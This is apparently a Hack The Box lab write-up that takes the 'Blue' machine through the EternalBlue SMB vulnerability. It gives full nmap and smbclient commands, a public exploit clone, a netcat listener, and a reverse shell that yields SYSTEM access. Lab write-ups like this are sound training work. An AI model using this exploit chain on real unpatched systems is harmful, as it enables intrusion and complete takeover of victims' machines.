vas0k

Application Security Engineer | Programmer

6 minute read

Introduction

This article, is aimed at rooting the machine “Blue”, on the online hacking platform — Hack the box.

As always —

Disclaimer As with all things related to ethical hacking, this machine is an intentionally vulnerable machine, whose purpose is to learn ethical hacking techniques. The techniques mentioned should NOT be used for illegal purposes, and should NOT be used on machines without prior authorization from the machine owner.

This was one of my first machines on the platform, and one of the most fun ones. The machine focuses on the “Eternal Blue” exploit that wreaked havoc during the year 2017 across the globe, due to a vulnerable SMB port. This vulnerability was discovered by the NSA at first, and they had developed an exploit for it. However, this exploit was leaked by a group known as the “Shadow Brokers”, and hackers from around the globe started utilizing this to their own advantage. A patch labeled MS17–010 was released by Microsoft soon after, but the damage was already done.

This vulnerability is still seen today, in some older unpatched systems, so better keep an eye out for this one!

Methodology

Scanning and enumeration

Let’s start by doing a bit of scanning to check for open ports on the target machine.

My attacker machine resides at 10.10.14.6 and the victim resides at 10.10.10.40.

 > sudo nmap -sS -T4 -p- -A 10.10.10.40 -oA blueTcpAll

 Nmap scan report for 10.10.10.40
 Host is up (0.26s latency).
 Not shown: 65519 closed ports
 PORT STATE SERVICE VERSION
 135/tcp open msrpc Microsoft Windows RPC
 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

 — snip —

 Network Distance: 2 hops
 Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
 |_clock-skew: mean: 3m38s, deviation: 1s, median: 3m37s
 | smb-os-discovery: 
 | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
 | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
 | Computer name: haris-PC
 | NetBIOS computer name: HARIS-PC\\x00
 | Workgroup: WORKGROUP\\x00
 |_ System time: 2020–12–13T03:26:44+00:00
 | smb-security-mode: 
 | account_used: guest
 | authentication_level: user
 | challenge_response: supported
 |_ message_signing: disabled (dangerous, but default)
 | smb2-security-mode: 
 | 2.02: 
 |_ Message signing enabled but not required
 | smb2-time: 
 | date: 2020–12–13T03:26:45
 |_ start_date: 2020–12–13T02:52:46

 TRACEROUTE (using port 3389/tcp)
 HOP RTT ADDRESS
 1 259.41 ms 10.10.14.1
 2 259.64 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 2021.39 seconds

We see a lot of information here. For starters, SMB is port is open, and we see that the machine is running Windows 7 OS. We could check if anonymous access is allowed, and what files are available on the victim machine. Let’s do that!

 > smbclient -L \\\\\\\\10.10.10.40\\\\

  Enter WORKGROUP\\kali’s password: 
  
  Sharename Type Comment
  — — — — — — — — — — -
  ADMIN$ Disk Remote Admin
  C$ Disk Default share
  IPC$ IPC Remote IPC
  Share Disk 
  Users Disk 
  Reconnecting with SMB1 for workgroup listing.
  do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
  Unable to connect with SMB1 — no workgroup available

There is a non-default share labelled “Share” on the victim machine. We could check to see what is inside that share.

 > smbclient \\\\\\\\10.10.10.40\\\\SHARE

 Enter WORKGROUP\\kali’s password: 

 Try “help” to get a list of possible commands.
 smb: \ ls
 . D 0 Fri Jul 14 09:48:44 2017
 .. D 0 Fri Jul 14 09:48:44 2017
 
 8362495 blocks of size 4096. 3775880 blocks available

Nothing interesting here. I wanted to check if there were any interesting files, such as software configuration files. We could enumerate the other shared folders as well, but there wasn’t anything interesting that would help us at this point. On an actual penetration test, the more you enumerate, the better!

As we saw that SMB is running, we can run an nmap script that checks for all known SMB vulnerabilities. Run the below command:

 > sudo nmap — script=smb-vuln* 10.10.10.40 -oA nmapSMBVulnScriptOutput

 Starting Nmap 7.91 ( [https://nmap.org](https://nmap.org) ) at 2020–12–12 22:56 EST
 Nmap scan report for 10.10.10.40
 Host is up (0.26s latency).
 Not shown: 991 closed ports
 PORT STATE SERVICE
 135/tcp open msrpc
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 49152/tcp open unknown
 49153/tcp open unknown
 49154/tcp open unknown
 49155/tcp open unknown
 49156/tcp open unknown
 49157/tcp open unknown

 Host script results:
 |_smb-vuln-ms10–054: false
 |_smb-vuln-ms10–061: NT_STATUS_OBJECT_NAME_NOT_FOUND
 | smb-vuln-ms17–010:
 | VULNERABLE:
 | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17–010)
 | State: VULNERABLE
 | IDs: CVE:CVE-2017–0143
 | Risk factor: HIGH
 | A critical remote code execution vulnerability exists in Microsoft SMBv1
 | servers (ms17–010).
 | 
 | Disclosure date: 2017–03–14
 | References:
 | [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143)
 | [https://technet.microsoft.com/en-us/library/security/ms17-010.aspx](https://technet.microsoft.com/en-us/library/security/ms17-010.aspx)
 |_ [https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/](https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/)

 Nmap done: 1 IP address (1 host up) scanned in 35.67 seconds

From the output above, nmap tells us that the machine is vulnerable to CVE-2017–0143 a.k.a Eternal Blue. This is a gold mine for attackers, as it is extremely easy to take advantage of this vulnerability, using tools such as Metasploit. I would be running an exploit manually here, but this can be done via Metasploit as well.

A bit(lot) of googling led me to: https://root4loot.com/post/eternalblue_manual_exploit/ Full credit goes to the author of this amazing exploit!

Do a git clone of the repo

> git clone [https://github.com/worawit/MS17-010.git](https://github.com/worawit/MS17-010.git)

This generates a folder, that contains 2 kernel shellcode files, and the main exploit(written in python).

Follow the instructions from the above mentioned website, for assembling the shellcode into binaries, to include in our exploit. These binaries consist of the shellcode, as well as the payload (our reverse shell), that would trigger the exploit, and send us a reverse shell. Nasm is the assembler that’s used here. We are creating 32-bit and 64-bit binaries and merging the two, into a single binary. This is useful, if the exploit is triggered against a machine with an unknown architecture (32-bit or 64-bit).

Before running the exploit, let’s set up a listener in a new terminal using netcat.

> sudo nc -nvlp 443
[sudo] password for kali:
listening on [any] 443 ..

Exploitation

Now, let’s run our exploit and get a shell! Make sure to include the IP address of the victim machine, and the generated binary, as the arguments to be used.

 > python eternalblue_exploit7.py 10.10.10.40 sc_all.bin
  shellcode size: 2203
  numGroomConn: 13
  Target OS: Windows 7 Professional 7601 Service Pack 1
  SMB1 session setup allocate nonpaged pool success
  SMB1 session setup allocate nonpaged pool success
  good response status: INVALID_PARAMETER
 done

Ignore the INVALID_PARAMETER error, as this doesn’t affect the success of the exploit.

Let’s go back to our terminal that’s running netcat, and we should have received a shell (Awesome!)

> sudo nc -nvlp 443
  [sudo] password for kali: 
  listening on [any] 443 …
  connect to [10.10.14.6] from (UNKNOWN) [10.10.10.40] 49158
  Microsoft Windows [Version 6.1.7601]
  Copyright © 2009 Microsoft Corporation. All rights reserved.
  
 C:\Windows\system32>

If this hasn’t worked for you, run the exploit again (make sure, to revert the machine on HackTheBox to it’s original state).

Let’s double check the IP address and hostname of the victim machine. Also, as you can see, we are running with full SYSTEM privileges on the target machine.

> C:\Windows\system32>hostname
  hostname
 haris-PC
  
  C:\Windows\system32>
  C:\Windows\system32> ipconfig
  ipconfig
  
  Windows IP Configuration
  
  
  Ethernet adapter Local Area Connection:
  
  Connection-specific DNS Suffix . : 
  IPv6 Address. . . . . . . . . . . : dead:beef::c4d9:ad53:c5c9:7e33
  Temporary IPv6 Address. . . . . . : dead:beef::2980:8ddc:2a48:dfea
  Link-local IPv6 Address . . . . . : fe80::c4d9:ad53:c5c9:7e33%11
 IPv4 Address. . . . . . . . . . . : 10.10.10.40
  Subnet Mask . . . . . . . . . . . : 255.255.255.0
  Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f9ab%11
  10.10.10.2
  
  Tunnel adapter isatap.{CBC67B8A-5031–412C-AEA7-B3186D30360E}:
  
  Media State . . . . . . . . . . . : Media disconnected
  Connection-specific DNS Suffix . : 
  
  Tunnel adapter Teredo Tunneling Pseudo-Interface:
  
  Media State . . . . . . . . . . . : Media disconnected
  Connection-specific DNS Suffix . : 
  
  C:\Windows\system32>
  C:\Windows\system32>whoami
  whoami
 nt authority\system

That’s it! Now go grab those flags and submit them to hackthebox. Hope this article was helpful!

Tags:

Categories:

Updated:

You May Also Enjoy

Overview of JWTs

4 minute read

This article gives an overview of a JWT, and goes over the structure of a JWT.

OWASP Juice Shop — SQL Injection

3 minute read

In this article, we are going to look at a SQL injection attack on a deliberately vulnerable application, that is provided by the OWASP foundation. This arti...